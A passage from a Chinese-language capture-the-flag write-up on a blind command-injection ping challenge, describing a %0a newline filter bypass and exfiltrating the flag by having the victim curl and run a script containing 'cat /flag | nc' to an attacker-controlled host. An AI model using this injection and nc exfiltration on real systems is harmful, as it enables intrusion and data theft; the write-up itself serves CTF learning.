参考:https://blog.csdn.net/m0_50317371/article/details/110489711

这个题有两个问题:

第一个就是没有回显,输入能够ping的ip无回显;输入特殊字符,提示含有危险字符;不输入,提示为空;这就导致即使执行成功的命令,比如:cat /flag,也不能看到flag

第二个问题就是过滤了很多字符,这个可用特殊字符字典抓包爆破,能够快速查找到没过滤的字符,%0a(换行符)

 

第一个问题方法:

  1. 需要一个可远程访问的网站,在网站上放一个文件,内容为 ls | cat /flag |nc 网站ip 8089;  ls的查询内容为cat 的输入内容
  2. 在受害机上curl 这个文件到指定目录
  3. 增加文件权限,chmod
  4. 在网站的ip下设置监听
  5. 执行文件,sh file,受害机在执行文件后就会连接到网站ip

这样,cat的内容才能在网站主机上显示出来

 

因为我不是在本机上搭的这题的环境,我也没有